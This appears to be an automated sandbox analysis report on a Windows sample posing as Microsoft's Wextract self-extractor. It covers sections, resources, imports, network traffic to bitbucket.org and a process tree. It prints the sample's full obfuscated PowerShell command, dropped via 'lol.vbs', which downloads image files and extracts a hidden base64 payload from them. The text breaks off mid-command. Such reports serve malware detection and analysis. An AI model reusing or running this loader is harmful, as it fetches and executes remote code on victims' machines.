                                                                                                                lea esi, dword ptr [000011BEh]
                                                                                                                dec eax
                                                                                                                lea ebx, dword ptr [0000119Fh]
                                                                                                                dec eax
                                                                                                                mov dword ptr [esp+30h], ebx
                                                                                                                mov dword ptr [esp+24h], eax
                                                                                                                dec ecx
                                                                                                                cmp ebx, esi
                                                                                                                jnc 00007FE1FC7FE271h
                                                                                                                test eax, eax
                                                                                                                jne 00007FE1FC7FE271h
                                                                                                                dec eax
                                                                                                                cmp dword ptr [ebx], 00000000h
                                                                                                                je 00007FE1FC7FE25Ch
                                                                                                                dec ecx
                                                                                                                mov edx, 5E523070h

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa2b40xb4.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1ccac.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x42c.pdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000x2c.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x9a680x54.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x138.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x91480x520.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x7e400x8000d22d8a48c14d2185814d2ed24fb0aed1False0.546173095703125data6.092855112591348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x90000x23400x30003748ff8966297360bdba725e2d585c23False0.318359375data3.84344715350442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0xc0000x1f000x1000f198899505f620007167379f74f8141cFalse0.083251953125data1.0384025678015962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .pdata0xe0000x42c0x10002d9ecb32a70228f2b07b654e216a79eeFalse0.156005859375data1.4378876073270839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0xf0000x1d0000x1d000a5961682fea5ad4ab587d57da1992791False0.735174771012931data7.04811713110433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x2c0000x2c0x1000cf22972a59e8c2a2ad0453d649f2025dFalse0.017578125data0.10781936458684958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                                                RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                                                RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                                                RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                                                RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                                RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                                                RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                                                RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                                                RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                                                RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                                                RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                                                RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                                                RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                                                RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                                                RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                                                                                                                RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                                                                                                                RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                                                                                                                RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                                                                                                                RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                                                                                                                RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                                                                                                                RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                                                                RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                                                                                                                RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                                                                                                                RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                                                                                                                RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                                                                                                                RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                                                                                                                RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                RT_RCDATA0x298700x1720Microsoft Cabinet archive data, Windows 2000/XP setup, 5920 bytes, 1 file, at 0x2c +A "lol.vbs", ID 704, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.0018581081081082
                                                                                                                RT_RCDATA0x2af900x4dataEnglishUnited States3.0
                                                                                                                RT_RCDATA0x2af940x24dataEnglishUnited States0.7222222222222222
                                                                                                                RT_RCDATA0x2afb80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                RT_RCDATA0x2afc00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                RT_RCDATA0x2afc80x4dataEnglishUnited States3.0
                                                                                                                RT_RCDATA0x2afcc0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                RT_RCDATA0x2afd40x4dataEnglishUnited States3.0
                                                                                                                RT_RCDATA0x2afd80xfASCII text, with no line terminatorsEnglishUnited States1.5333333333333334
                                                                                                                RT_RCDATA0x2afe80x4dataEnglishUnited States3.0
                                                                                                                RT_RCDATA0x2afec0x4dataEnglishUnited States3.0
                                                                                                                RT_RCDATA0x2aff00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                RT_RCDATA0x2aff80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                RT_GROUP_ICON0x2b0000xbcdataEnglishUnited States0.6117021276595744
                                                                                                                RT_VERSION0x2b0bc0x408dataEnglishUnited States0.42248062015503873
                                                                                                                RT_MANIFEST0x2b4c40x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                                                                GDI32.dllGetDeviceCaps
                                                                                                                USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                                                                                msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                                                                                COMCTL32.dll
                                                                                                                Cabinet.dll
                                                                                                                VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                                                                                Version Infos

                                                                                                                DescriptionData
                                                                                                                CompanyNameMicrosoft Corporation
                                                                                                                FileDescriptionWin32 Cabinet Self-Extractor
                                                                                                                FileVersion11.00.20348.1 (WinBuild.160101.0800)
                                                                                                                InternalNameWextract
                                                                                                                LegalCopyright Microsoft Corporation. All rights reserved.
                                                                                                                OriginalFilenameWEXTRACT.EXE .MUI
                                                                                                                ProductNameInternet Explorer
                                                                                                                ProductVersion11.00.20348.1
                                                                                                                Translation0x0409 0x04b0

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States

                                                                                                                Network Behavior

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Feb 1, 2025 16:43:45.148477077 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:45.148511887 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:45.148627043 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:45.156668901 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:45.156686068 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:45.812035084 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:45.812119007 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:45.816448927 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:45.816457987 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:45.816783905 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:45.828485966 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:45.875338078 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:46.225512981 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:46.225543022 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:46.225559950 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:46.225646973 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:46.225667000 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:46.225697041 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:46.225719929 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:46.307034016 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:46.307132006 CET44349709185.166.143.49192.168.2.6
                                                                                                                Feb 1, 2025 16:43:46.307302952 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:46.307302952 CET49709443192.168.2.6185.166.143.49
                                                                                                                Feb 1, 2025 16:43:46.328020096 CET49709443192.168.2.6185.166.143.49

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Feb 1, 2025 16:43:45.127779961 CET6393853192.168.2.61.1.1.1
                                                                                                                Feb 1, 2025 16:43:45.140199900 CET53639381.1.1.1192.168.2.6

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Feb 1, 2025 16:43:45.127779961 CET192.168.2.61.1.1.10x3347Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Feb 1, 2025 16:43:45.140199900 CET1.1.1.1192.168.2.60x3347No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                Feb 1, 2025 16:43:45.140199900 CET1.1.1.1192.168.2.60x3347No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                Feb 1, 2025 16:43:45.140199900 CET1.1.1.1192.168.2.60x3347No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • bitbucket.org

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.649709185.166.143.494436568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-02-01 15:43:45 UTC98OUTGET /dfghd/fgd/downloads/test.jpg?137113 HTTP/1.1
                                                                                                                Host: bitbucket.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-02-01 15:43:46 UTC4800INHTTP/1.1 404 Not Found
                                                                                                                Date: Sat, 01 Feb 2025 15:43:46 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 15017
                                                                                                                Server: AtlassianEdge
                                                                                                                Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                                                                                                                X-Used-Mesh: False
                                                                                                                Content-Language: en
                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                Etag: "7f7908308f366abffcf098bdafef16bb"
                                                                                                                X-Dc-Location: Micros-3
                                                                                                                X-Served-By: fba66d1138ab
                                                                                                                X-Version: dedd26be6991
                                                                                                                X-Static-Version: dedd26be6991
                                                                                                                X-Request-Count: 2166
                                                                                                                X-Render-Time: 0.047760963439941406
                                                                                                                X-B3-Traceid: 2b02383bb86b411b8d755437b7c10aad
                                                                                                                X-B3-Spanid: ccb633098079d451
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Content-Security-Policy: base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.pr [TRUNCATED]
                                                                                                                X-Usage-Quota-Remaining: 998977.061
                                                                                                                X-Usage-Request-Cost: 1036.90
                                                                                                                X-Usage-User-Time: 0.030391
                                                                                                                X-Usage-System-Time: 0.000716
                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                Cache-Control: max-age=900
                                                                                                                Age: 433
                                                                                                                X-Cache: HIT
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                Atl-Traceid: 3c78d39dd3954d19bc5bbdd6dbbab073
                                                                                                                Atl-Request-Id: 3c78d39d-d395-4d19-bc5b-bdd6dbbab073
                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                Server-Timing: atl-edge;dur=94,atl-edge-internal;dur=3,atl-edge-upstream;dur=92,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                Connection: close
                                                                                                                2025-02-01 15:43:46 UTC11584INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 49 52 47 2f 45 4d 4c 45 6b 75 36 73 39 62 65 50 53 57 37 74 41 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="2IRG/EMLEku6s9bePSW7tA==">if (wind
                                                                                                                2025-02-01 15:43:46 UTC3433INData Raw: 0a 20 20 3c 2f 64 69 76 3e 0a 0a 0a 0a 20 20 0a 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 49 52 47 2f 45 4d 4c 45 6b 75 36 73 39 62 65 50 53 57 37 74 41 3d 3d 22 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 5f 69 6e 69 74 69 61 6c 5f 73 74 61 74 65 5f 5f 20 3d 20 7b 22 67 6c 6f 62 61 6c 22 3a 20 7b 22 67 65 6f 69 70 5f 63 6f 75 6e 74 72 79 22 3a 20 6e 75 6c 6c 2c 20 22 69 73 5f 6d 6f 62 69 6c 65 5f 75 73 65 72 5f 61 67 65 6e 74 22 3a 20 66 61 6c 73 65 2c 20 22 73 69 74 65 5f 6d 65 73 73 61 67 65 22 3a 20 22 22 2c 20 22 6e 65 65 64 73 5f 6d 61 72 6b 65 74 69 6e 67 5f 63 6f 6e 73 65 6e 74 22 3a 20 66 61 6c 73 65 2c 20 22 6d 61 72 6b 65 74 69 6e 67 5f 63 6f 6e 73 65 6e 74 5f 6c 6f 63 61 6c 65 22 3a 20 6e 75 6c 6c 2c 20 22 77 68 61 74 73 5f 6e 65 77 5f 66 65
                                                                                                                Data Ascii: </div> <script nonce="2IRG/EMLEku6s9bePSW7tA=="> window.__initial_state__ = {"global": {"geoip_country": null, "is_mobile_user_agent": false, "site_message": "", "needs_marketing_consent": false, "marketing_consent_locale": null, "whats_new_fe


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:10:43:40
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Users\user\Desktop\00wVZ1NU5b.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\00wVZ1NU5b.exe"
                                                                                                                Imagebase:0x7ff7e74f0000
                                                                                                                File size:180'224 bytes
                                                                                                                MD5 hash:A11A8DA90AD22616CA604476CB9F2749
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:10:43:40
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:cmd /c lol.vbs
                                                                                                                Imagebase:0x7ff6ad9d0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:10:43:40
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:4
                                                                                                                Start time:10:43:41
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs"
                                                                                                                Imagebase:0x7ff66e520000
                                                                                                                File size:170'496 bytes
                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:5
                                                                                                                Start time:10:43:41
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@